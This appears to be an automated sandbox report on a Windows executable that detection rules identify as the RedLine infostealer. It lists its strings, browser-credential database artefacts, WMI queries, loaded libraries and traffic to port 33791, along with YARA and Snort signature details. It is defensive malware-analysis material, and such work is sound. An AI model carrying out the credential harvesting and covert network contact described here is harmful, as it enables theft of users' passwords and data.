                      Source: tmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: tmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: tmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeString found in binary or memory: https://ipinfo.io/ip%appdata%
                      Source: tmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: tmp21BF.tmp.0.dr, tmpE7CE.tmp.0.dr, tmpE7DE.tmp.0.dr, tmp21D0.tmp.0.dr, tmp21E1.tmp.0.dr, tmp219F.tmp.0.dr, tmp21F2.tmp.0.dr, tmp219E.tmp.0.dr, tmp21CF.tmp.0.dr, tmpE7BC.tmp.0.dr, tmpE7CD.tmp.0.dr, tmpE7EF.tmp.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443

                      System Summary

                      barindex
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, type: SAMPLEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, type: SAMPLEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, type: SAMPLEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.0.3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe.c70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 0.0.3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe.c70000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                      Source: 0.0.3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe.c70000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 00000000.00000000.1664106626.0000000000C72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: Process Memory Space: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe PID: 7300, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeStatic PE information: section name:
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_0171E7B00_2_0171E7B0
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_062C96280_2_062C9628
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_062CDD000_2_062CDD00
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_062C44680_2_062C4468
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_062C12100_2_062C1210
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_062CD1080_2_062CD108
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_0770D1B80_2_0770D1B8
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_077005D80_2_077005D8
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_077005C80_2_077005C8
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841017062.000000000174E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.0000000003492000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000036B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirefox.exe0 vs 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000036B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000036B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000036B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000036B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000036B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000036B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000036B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\080904B0\\OriginalFilename vs 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000002.1841742804.00000000036B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, 00000000.00000000.1664106626.0000000000C72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeBinary or memory string: OriginalFilenameImplosions.exe4 vs 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, type: SAMPLEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, type: SAMPLEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe, type: SAMPLEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.0.3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe.c70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 0.0.3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe.c70000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                      Source: 0.0.3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe.c70000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 00000000.00000000.1664106626.0000000000C72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: Process Memory Space: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe PID: 7300, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/117@1/2
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile created: C:\Users\user\AppData\Local\Temp\tmpAD4D.tmpJump to behavior
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: tmpE799.tmp.0.dr, tmpAD4D.tmp.0.dr, tmpE7AA.tmp.0.dr, tmpE7AB.tmp.0.dr, tmpE79A.tmp.0.dr, tmpE788.tmp.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeVirustotal: Detection: 69%
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeReversingLabs: Detection: 76%
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeString found in binary or memory: 3The file %s is missing. Please, re-install this applicationFDS_WL_
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeString found in binary or memory: uC:\Users\Admin\AppData\Local\Temp\10854240016405293e8c.exeRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeU
                      Source: unknownProcess created: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe "C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe"
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: tmp82E6.tmp.0.drLNK file: ..\..\..\..\..\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeStatic file information: File size 4685824 > 1048576
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeStatic PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                      Source: initial sampleStatic PE information: section where entry point is pointing to:
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeStatic PE information: real checksum: 0x1bb953 should be: 0x47f59b
                      Source: 3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeStatic PE information: section name:
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_0171BF60 push esp; iretd 0_2_0171BF9A
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_0171BF48 pushad ; iretd 0_2_0171BF52
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_0171BFEC pushfd ; iretd 0_2_0171BFFA
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_0171BFBC pushfd ; iretd 0_2_0171BFFA
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_0171BF90 push esp; iretd 0_2_0171BF9A
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_0171BF9C pushad ; iretd 0_2_0171BFAA
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_0171BF84 pushfd ; iretd 0_2_0171BF8E
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_062C1810 push es; ret 0_2_062C1820
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_0770CDBF push dword ptr [esp+ecx*2-75h]; ret 0_2_0770CDC3
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_0770CC45 push edi; ret 0_2_0770CC46
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeCode function: 0_2_0770DC1B push FFFFFF8Bh; retf 0_2_0770DC1D

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 33791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 33791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 33791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 33791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 49733
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
